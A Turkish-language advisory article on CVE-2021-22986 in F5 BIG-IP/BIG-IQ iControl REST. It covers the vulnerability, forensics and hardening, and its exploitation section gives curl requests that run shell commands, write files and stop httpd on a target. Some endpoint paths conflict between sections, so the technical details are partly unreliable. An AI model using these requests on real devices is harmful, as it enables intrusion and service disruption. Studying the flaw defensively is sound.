CVE-2021-22986 · Bilgilendirme

F5 BIG-IP and BIG-IQ Centralized Management iControl REST Remote Code Execution Vulnerability

F5 BIG-IP ve BIG-IQ'de uzaktan kod yürütme zafiyeti, saldırganlara kritik sistem komutları çalıştırma imkanı tanıyor.

Üretici
F5
Ürün
BIG-IP and BIG-IQ Centralized Management
Seviye
yüksek
Yayın Tarihi
05 Nisan 2026
Okuma
9 dk okuma

CVE-2021-22986: F5 BIG-IP and BIG-IQ Centralized Management iControl REST Remote Code Execution Vulnerability

Zorluk Seviyesi: Orta | Kaynak: CISA KEV

Zafiyet Analizi ve Giriş

F5 BIG-IP ve BIG-IQ Centralized Management sistemleri, ağ donanımları ve güvenlik çözümleri sunan F5 Networks tarafından geliştirilen kritik altyapı unsurlarıdır. Bu ürünler, global ölçekte birçok sektörde, özellikle finans, sağlık, telekomünikasyon ve e-ticaret alanlarında yaygın olarak kullanılmaktadır. Ancak, 2021 yılında keşfedilen CVE-2021-22986 zafiyeti, bu sistemlerin güvenliği açısından ciddi bir tehdit oluşturmuştur.

CVE-2021-22986, F5’in iControl REST (Representational State Transfer) arayüzünde bulunan bir uzaktan kod çalıştırma (RCE - Remote Code Execution) zafiyetidir. Bu zafiyet, kimlik doğrulaması gerektirmeksizin ağ üzerinden erişimi olan bir saldırganın sistem komutları çalıştırmasına, dosya oluşturma veya silme işlemlerine ve hizmetlerin devre dışı bırakılmasına olanak tanımaktadır. Zafiyetin altında yatan neden, iControl REST arayüzünün yetersiz güvenlik kontrollerinden kaynaklanmaktadır. Sistem, belirli giriş verilerini doğru bir şekilde doğrulamadığı için, saldırganlar istediklerini gerçekleştirmek için gerekli komutları çalıştırabilir.

Zafiyet, F5 BIG-IP ve BIG-IQ sistemlerinin çeşitli sürümlerini etkilemektedir. Özellikle, bu sistemlerin birçok versiyonunda, REST API yönlendirmesi sırasında gelen verilerin filtrelenmemesi ve uygun bir şekilde işlenmemesi, uzaktan yetkilendirilmemiş erişimlere kapı aralamaktadır. Örneğin, bir saldırgan, aşağıdaki gibi bir komut göndererek sistem üzerinde tehlikeli işlemler yapabilir:

curl -X POST -H "Content-Type: application/json" -d '{"command":"run","name":"your-command"}' http://<big-ip-ip>/mgmt/tm/sys/command

Bu komut, saldırgana, F5 BIG-IP cihazı üzerinde belirli komutları çalıştırma yetkisi tanımaktadır. Saldırganın böyle bir yetkiye sahip olması, büyük veri ihlalleri ve hizmet kesintilerine yol açabilir.

Sektörler açısından değerlendirildiğinde, bu zafiyet özellikle finans ve sağlık sektörlerini hedef almıştır. Örneğin, büyük bir banka veya sağlık kurumu, F5 BIG-IP cihazları aracılığıyla kritik veri işlemleri gerçekleştirmektedir. Eğer bir saldırgan bu zafiyeti kullanarak sisteme erişim sağlarsa, müşteri verileri tehlikeye girebilir ve kurumun itibarına ciddi zararlar verebilir.

Bu tür zafiyetlerin etkileri, kullanıcı güvenliği ve veri bütünlüğünü tehdit etmesinin yanı sıra, hizmetlerin kesintiye uğramasına da neden olabilmektedir. Hizmet kesintileri, özellikle müşteri deneyimi açısından büyük kayıplara yol açabilir. Ürün ve hizmetlerin güvenliği, işletmelerin sosyal ve ekonomik katkılarını da yakından etkilemektedir.

Sonuç olarak, CVE-2021-22986 zafiyeti, hem F5 BIG-IP ve BIG-IQ sistemlerinin güvenliğini sorgularken hem de bu ürünleri kullanan kuruluşlarda ciddi bir güvenlik denetimi gerektirmektedir. Geliştiricilerin, bu tür zafiyetlerden kaynaklanan tehdidi en aza indirgemek için güvenlik açıklarını hızlıca kapatması ve sistemlerini güncel tutması büyük önem taşımaktadır. Bu bağlamda, sürekli eğitim ve güvenlik bilincinin artırılması da bireylerin ve kuruluşların güvenlik durumunu güçlendirecektir.

Teknik Sömürü (Exploitation) ve PoC

F5 BIG-IP ve BIG-IQ Centralized Management sistemlerinde tespit edilen CVE-2021-22986 zafiyeti, uzaktan kod çalıştırma (RCE - Remote Code Execution) yetkisi sağlar. Bu zafiyet, iControl REST arayüzü üzerinden gerçekleştirilebilmektedir ve kullanıcının kimlik doğrulaması gerektirmeden sistem komutlarını çalıştırmasına, dosya oluşturmasına veya silmesine ve hizmetleri devre dışı bırakmasına olanak tanır. Bu nedenle, siber güvenlik uzmanları ve beyaz şapkalı hackerlar için bu açığın nasıl sömürülebileceğini anlamak kritik bir öneme sahiptir.

F5 BIG-IP ve BIG-IQ sistemleri, birçok ağdaki kritik uygulamaların yönetilmesi için kullanılır. Zafiyetin kötüye kullanılması, saldırganın hedef sistem üzerinde tam kontrole sahip olmasına yol açabilir, bu da veri sızıntısı, hizmet aksaklığı veya daha ciddi zarar verme eylemlerine neden olabilir. Bir senaryo olarak, bir finans kurumu üzerindeki bir BIG-IP cihazına uzaktan erişim sağlandığını varsayalım. Bu durumda, saldırganın erişimi, finansal bilgiler üzerinde tam kontrol sağlamasına neden olabilir.

Sömürü sürecine gelince, aşağıdaki adımlar izlenebilir:

  1. Ağda Cihaz Keşfi: İlk olarak, hedef ağ üzerinde F5 BIG-IP veya BIG-IQ sistemlerinin tespit edilmesi gerekir. Bunun için nmap gibi ağ keşif araçları kullanılabilir:
   nmap -sP 192.168.1.0/24
  1. iControl REST Arayüzüne Erişim Sağlama: Hedef sistemin iControl REST arayüzünün açık olup olmadığı kontrol edilmelidir. Basit bir HTTP isteğiyle bu kontrol sağlanabilir:
   curl -i http://[hedef_ip]/mgmt/tm/ \
   -H 'Content-Type: application/json'

Eğer bu istek, hata olmaksızın yanıt veriyorsa, bu arayüzün kullanılabilir olduğu anlamına gelir.

  1. Zafiyeti Sömürme: Sistemin komut çalıştırma özelliğini ya da dosyalara erişimi sağlamak için uygun bir payload kullanılmalıdır. Kötüye kullanım için json formatında bir istek oluşturulabilir:
   curl -X POST http://[hedef_ip]/mgmt/tm/util/bash \
   -H 'Content-Type: application/json' \
   -d '{"command": "run", "utilCmdArgs": "-c \"whoami\""}'

Yukarıdaki istek, hedef sistemde "whoami" komutunu çalıştırarak, saldırganın hangi kullanıcı altında çalıştığını öğrenmesini sağlar.

  1. Komut Çalıştırma ve Dosya İşlemleri: Saldırgan, sistem üzerinde farklı komutları çalıştırarak, dosya oluşturma veya silme işlemleri yapabilir. Örneğin, yeni bir dosya oluşturmak için:
   curl -X POST http://[hedef_ip]/mgmt/tm/util/bash \
   -H 'Content-Type: application/json' \
   -d '{"command": "run", "utilCmdArgs": "-c \"echo 'Malicious Code' > /tmp/malicious_file.txt\""}'
  1. Hizmetlerin Devre Dışı Bırakılması: Ayrıca, kritik hizmetleri devre dışı bırakmak için uygun komutları göndererek sistemin işleyişini bozmak, saldırganın elinde bir başka imkandır:
   curl -X POST http://[hedef_ip]/mgmt/tm/sys/service \
   -H 'Content-Type: application/json' \
   -d '{"command": "stop", "name": "httpd"}'

Bu teknik aşamalar, zafiyetin kötüye kullanımını göstermekle beraber, etik hackerlar için bu tür zafiyetlerin tespiti ve raporlanması önemlidir. Tespit edilen zafiyetler, etkili bir siber güvenlik yönetimi için hızlı bir şekilde ilgili ürün üreticisine bildirilmelidir.

Herhangi bir siber saldırının önüne geçmek ve sistemlerin güvenliğini sağlamak için, sürekli güncellemeler yaparak ve zafiyetlerin izlenmesi gerektiği unutulmamalıdır. Bu bağlamda, CVE-2021-22986 zafiyetini anlamak ve ona göre önlemler almak, güvenlik durumunun iyileştirilmesi açısından kritik bir adımdır.

Forensics (Adli Bilişim) ve Log Analizi

F5 BIG-IP ve BIG-IQ Centralized Management üzerindeki CVE-2021-22986 zafiyeti, siber güvenlik alanında önemli bir tehdit oluşturmaktadır. Bu zafiyet, iControl REST arayüzünde bulunmakta olup, kimlik doğrulaması olmadan ağ erişimi olan saldırganların sistem komutlarını çalıştırmalarına, dosya oluşturmalarına veya silmelerine ve hizmetleri devre dışı bırakmalarına olanak tanımaktadır. Bu tür uzaktan kod yürütme (RCE) zafiyetleri, saldırganların sistem üzerinde geniş bir kontrol elde etmesine neden olabilir ve sonuçları oldukça yıkıcı olabilir.

Zafiyetin anlaşılabilmesi için forensics (adli bilişim) ve log analizi konularına derinlemesine bakalım. Bir siber güvenlik uzmanı, bir RCE saldırısının yapıldığını tespit etmek için SIEM (Security Information and Event Management) araçları ve sistem log dosyalarını incelemelidir. Bu süreçte dikkat edilmesi gereken bazı önemli noktalar ve imzalar bulunmaktadır.

Öncelikle, sistemin erişim loglarını (Access log) incelemek gerekir. Erişim loglarında, özellikle şüpheli IP adreslerinden gelen isteklerin sıklığı ve doğası sorgulanmalıdır. Bu loglarda anormal veya olağandışı HTTP istekleri, örneğin HTTP POST veya GET isteklerinin uygulama üzerinde beklenmedik yolları hedeflemesi, dikkat çekici bulgular olabilir. Aşağıda bir örnek log kalıbı verilmiştir:

192.168.1.100 - - [28/Oct/2021:10:00:00 +0000] "POST /mgmt/tm/system/command?command=run HTTP/1.1" 200 0

Bu log kaydındaki "POST" isteği, bir komut çalıştırma girişimini göstermektedir. Kullanıcı (veya saldırgan) erişim hakkına sahip olmadığı hâlde bir sistem komutunu çalıştırmaya teşebbüs etmiş. Bu tür IP adreslerinin ve HTTP isteklerinin detaylı incelenmesi, potansiyel bir RCE saldırısını anlamak için kritik öneme sahiptir.

Bir başka dikkat edilecek log alanı ise hata loglarıdır (Error log). Hata logları, sistemde meydana gelen anormal durumları rapor eder. RCE saldırganları, sistemde komut çalıştırırken veya dosya oluşturmaya çalışırken genellikle hata mesajlarına neden olacak şekilde girişimlerde bulunurlar. Burada, gereksiz yere yapılan yanlış komut çalıştırma girişimleri, sistem hatalarının tekrarı veya beklenmeyen hata kodları gözlemlenmelidir. Örneğin:

2021-10-28 10:00:05 error: Command execution failed for unauthorized request from IP 192.168.1.100

Bu log, belirli bir IP adresinin kimlik doğrulaması olmadan yetkisiz bir şekilde komut çalıştırma girişiminde bulunduğunu göstermektedir.

Ayrıca, log analizi sırasında sistemde oluşan tüm dosya değişiklikleri ve kayıtlara da dikkat edilmelidir. Bir dosya oluşturma veya silme işlemi sırasında logların bir kaydını bırakması beklenir. Bu nedenle, şüpheli dosya oluşturma veya silme girişimleri, özellikle de kullanıcıların beklediği alanlar dışında gerçekleştiğinde, potansiyel bir saldırının habercisi olabilir.

Siber güvenlik uzmanları, log analizi ve forensics becerilerini geliştirerek, bu tür saldırıların tespitinde daha etkili olabilir. Özellikle sistemin normal davranış biçimlerini bilmek, olağandışı aktiviteleri hızlı bir şekilde belirlemek için büyük önem taşır. Bu noktada, otomatik log analizi ve belirli imzaların belirlenmesi, saldırı tespit sistemlerinin (IDS) etkinliğini artırır ve bu tür siber tehditlerin önlenmesinde önemli bir rol oynar.

Sonuç olarak, CVE-2021-22986 zafiyetinin tespiti için log analizi, oldukça derin bir anlayış ve dikkat gerektiren bir süreçtir. Erişim logları, hata logları ve sisteme ait dosya değişikliklerini izlemek, siber güvenlik uzmanlarının bu tehlikeye karşı alabileceği en önemli önlemlerden biridir.

Savunma ve Sıkılaştırma (Hardening)

F5 BIG-IP ve BIG-IQ Centralized Management, iControl REST arayüzünde bulunan bir uzaktan kod çalışma açığı (Remote Code Execution - RCE) ile ciddi bir risk taşımaktadır. Bu zafiyet, yetkisiz saldırganların ağ erişimi üzerinden sistem komutları çalıştırmasına, dosyalar oluşturmasına veya silmesine ve hizmetleri devre dışı bırakmasına olanak tanır. Bu tür zayıflıklara karşı koruma sağlamak için etkili savunma ve sıkılaştırma yöntemleri uygulamak büyük önem arz etmektedir.

Öncelikle, sistem mimarisine ve işleyişine dair bir anlayış geliştirilmesi gerekmektedir. F5 BIG-IP cihazları, genellikle ağdaki kritik bileşenlerin yönetimi için kullanılır. Dolayısıyla, bir saldırganın bu cihazlar üzerinden sistem komutlarına erişim sağlaması, ağdaki diğer bileşenlerin güvenliğini de tehdit edebilir. Gerçek dünya senaryolarında, bir kötü niyetli kullanıcının iControl REST arayüzü üzerinden erişim sağladığını ve sistem üzerinde yetkisiz değişiklikler yaptığını varsaydığımızda, bu durumla başa çıkma yolları oldukça kritik hale gelmektedir.

Bu açığı kapatmak için öncelikle F5 tarafından yayınlanan güvenlik güncellemelerinin takip edilmesi gerekir. Üreticinin güvenlik tavsiyeleri arasında, cihazların yazılım güncellemelerinin düzenli aralıklarla gerçekleştirilmesi ve öngörülen yamaların uygulanması önerilmektedir. Ancak, yalnızca yazılım güncellemeleri yeterli olmayabilir. Bu nedenle, ek güvenlik önlemleri almak da önemlidir.

Alternatif firewall (Web Application Firewall - WAF) kuralları oluşturarak, iControl REST arayüzüne yapılacak istekleri kısıtlamak, potansiyel bir saldırının önüne geçebilir. Örneğin, belirli IP adreslerinden gelen isteklerin sınırlanması veya sadece kurumsal ağ içinden gelen isteklerin kabul edilmesi bu anlamda faydalı olabilir. Bu tür bir kural uygulamak için firewall cihazınızın arayüzünden aşağıdaki örnek yapılandırmayı kullanabilirsiniz:

<AccessPolicy>
    <IPWhitelist>
        <IP>192.168.1.0/24</IP>
    </IPWhitelist>
</AccessPolicy>

Gelişmiş izleme ve loglama mekanizmalarının kurulması da önemlidir. Sistem üzerinde gerçekleşen tüm aktivitelerin kayıt altına alınması, anormal davranışların tespiti açısından hayati önem taşır. Log analizi ile olası saldırıların tespit edilmesi, gerekli aksiyonların zamanında alınmasını sağlar. Ayrıca, sistemde çalışan hizmetlerin sıkı bir şekilde denetlenmesi ve gereksiz hizmetlerin devre dışı bırakılması, bir sızma durumunda atak yüzeyini azaltarak saldırganların işini zorlaştırır.

Bunların yanı sıra, sıkılaştırma önerileri arasında şifrelerin güçlü bir şekilde oluşturulması ve düzenli olarak değiştirilmesi de yer alır. Zafiyetlerin kötüye kullanılmasını önlemek adına, sistem üzerindeki yönetici hesaplarının (admin) yalnızca gerekli durumlarda kullanılmasına özen gösterilmelidir. Parola ve erişim kontrol ilkeleri dikkat edilmesi gereken diğer bir noktadır. Erişim kontrolleri ve güvenlik ilkeleri net bir şekilde belirlenmeli ve olabildiğince azaltılmalıdır.

Son olarak, çalışanlar üzerinde bilgilendirme ve farkındalık artırma eğitimleri düzenleyerek, sosyal mühendislik tekniklerine karşı bir farkındalık oluşturmak, insan faktöründen kaynaklanabilecek sızıntıların önüne geçebilir. Eğitimlerin yanı sıra, sistemin güvenliğini artırmak amacıyla düzenli güvenlik testleri ve penetrasyon testleri gerçekleştirilmeli, zafiyet taramaları düzenli olarak yapılmalıdır.

Bu tür önlemler, F5 BIG-IP ve BIG-IQ sistemlerinin güvenliğini artırmak ve potansiyel tehditlere karşı hazırlıklı olmak açısından kritik öneme sahiptir. Her zaman güncel kalmak ve güvenlik açıklarını proaktif bir şekilde ele almak, siber güvenlikte başarılı olmanın anahtarıdır.